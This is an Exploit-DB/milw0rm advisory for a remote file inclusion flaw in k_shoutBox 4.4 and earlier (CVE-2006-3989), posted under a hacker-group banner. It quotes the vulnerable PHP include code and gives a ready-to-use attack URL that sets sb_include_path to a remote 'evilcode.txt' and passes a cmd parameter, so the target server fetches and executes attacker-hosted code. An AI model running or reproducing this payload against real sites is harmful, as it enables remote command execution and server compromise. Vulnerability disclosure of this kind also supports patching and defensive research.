k_shoutbox <= 4.4 - Remote File Inclusion Vulnerability

2006-08-01T00:00:00
ID EDB-ID:2103
Type exploitdb
Reporter Kurdish Security
Modified 2006-08-01T00:00:00

Description

k_shoutBox <= 4.4 Remote File Inclusion Vulnerability. CVE-2006-3989. Webapps exploit for php platform

                                        
                                            &gt;&gt;&gt; Kurdish Security

&gt;&gt;&gt; ShoutBox Remote Command Execution

&gt;&gt;&gt; Freedom For Ocalan

&gt;&gt;&gt; Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

&gt;&gt;&gt; Rish : High

&gt;&gt;&gt; Class : Remote

&gt;&gt;&gt; Script : ShoutBox

&gt;&gt;&gt; Site : http://www.knusperleicht.at

Code :


//**********************************************************
//  INCLUDE PATH
define('SB_INCLUDE_PATH', $sb_include_path);
//  INCLUDE PATH
//**********************************************************

include SB_INCLUDE_PATH.'inc/config.inc.php';
require_once SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php';
require_once SB_INCLUDE_PATH.'inc/Sb_template.php';
require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php';
require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php';
require_once SB_INCLUDE_PATH.'inc/Sb_database.php';
if(SB_INCLUDE_PATH == "")  {


http://www.site.com/[path]/sb/index.php?sb_include_path=http://[site]/evilcode.txt?&cmd=id

# milw0rm.com [2006-08-01]